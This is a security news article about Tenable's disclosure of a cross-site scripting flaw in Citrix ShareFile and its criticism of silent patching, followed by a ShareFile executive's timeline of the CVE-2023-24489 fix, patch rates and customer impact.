Tenable Research recently disclosed the discovery of a vulnerability impacting Citrix ShareFile. The issue is a reflected cross-site scripting attack which could allow a malicious actor to steal login credentials, tokens, execute code in the context of a victim’s browser, or perform a variety of other malicious actions. Citrix has decided not to alert customers about the issue. This is happening at a time when ransomware gangs like CL0P are notorious for targeting file transfer apps.
Tenable Research recently disclosed the discovery of a vulnerability impacting Citrix ShareFile. If exploited, the reflected cross-site scripting vulnerability could have allowed a malicious actor to steal login credentials, tokens, execute code in the context of a victim’s browser, or perform a variety of other malicious actions.
Despite the potential impact of the vulnerability, Citrix has elected not to publish information regarding this issue or provide notice to customers after they patched the issue. Customers are entirely beholden to the cloud providers to fix reported issues, forced to blindly trust that proper care has gone into effectively remediating any vulnerabilities. This lack of transparency is a disservice to their customers and leaves them in the dark about their exposure to risk before patches were issued. The practice of silent patching by cloud service providers hinders risk assessment and creates new challenges for security teams to understand the risks of their cloud environments. While a patch was issued, potentially affected customers may be unaware that any nefarious activity took place.
With ransomware groups like CL0P targeting file transfer applications including Fortra’s GoAnywhere managed file transfer (MFT) and Progress Software’s MOVEit Transfer MFT software, securing these solutions and identifying potential avenues for exploitation are critical to the success of staying a step ahead of opportunistic attackers.
David Le Strat, SVP Product & Technology at ShareFile said, We have seen some inaccuracies in reporting of the above news related to “ShareFile Vulnerability”, and want to ensure that the most up-to-date and accurate information is shared with regard to this vulnerability, and ShareFile’s approach to assuring the safety of customers’ data.
See Below a timeline of ShareFile’s response to this incident and accurate figures in regard to the impact on customers.
- A fix for CVE-2023-24489 was released on May 11, 2023 with Version 5.11.24 (one month before the security bulletin was issued).
- Customer patching was proactively handled and, by June 13, over 83% of these customers had patched their environments, before the incident was made public. Also, by June 13, all unpatched SZC hosts were blocked from connecting to the ShareFile cloud control plane, making unpatched SZC hosts unusable with ShareFile.
- On Aug. 16, CISA added the CVE to their known exploited vulnerability catalog; while there was a spike to 75 attacks following this, this died down immediately given that the issue has been addressed.
- When this vulnerability was discovered, we worked with and notified impacted customers in advance of the announced CVE to update to the latest version of our software to assure the safety of their data. Our control plane is no longer connected to any ShareFile StorageZones Controller (SZC) that is not patched.
- The incident affected less than 3% of our install base (2800 customers)
- There is no known data theft from this incident
